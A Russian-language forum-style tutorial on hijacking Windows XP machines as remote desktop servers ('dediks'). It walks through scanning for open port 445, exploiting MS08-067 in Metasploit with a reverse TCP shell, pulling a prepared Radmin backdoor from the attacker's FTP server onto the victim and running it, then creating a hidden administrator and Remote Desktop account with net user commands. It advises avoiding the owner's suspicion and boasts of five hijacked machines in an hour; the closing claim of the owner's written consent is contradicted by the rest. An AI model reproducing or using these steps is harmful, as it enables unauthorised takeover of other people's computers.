Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapiкоторый использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !
Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,
Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы
Предположим что FTP сервер у нас установлен и настроен , в cmd пишем
Code
C:\>ftp ftp> o К 10.xx.xx.xx Связь с 10.xx.xx.xx . 220 Welcome to 10.xx.xx.xx FTP service. Пользователь (10.xx.xx.xx :(none)): anonymous 230 Login successful. ftp>
Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой PHP код:
Code
dir
Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы
Code
get sys.exe bye
Файл залит , выходим с фтп и возвращаемся а наш шелл
смотрим залит ли файл
и запускаем его
Code
C:>sys.exe
Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу
Замечательно конект есть , вбиваем наш пароль и вот мы дома
Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
Code
cmd net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited exit
Далее радмином в режиме "Телнет " запустим наш terminal.exe
Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50
Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо ! ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !
Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .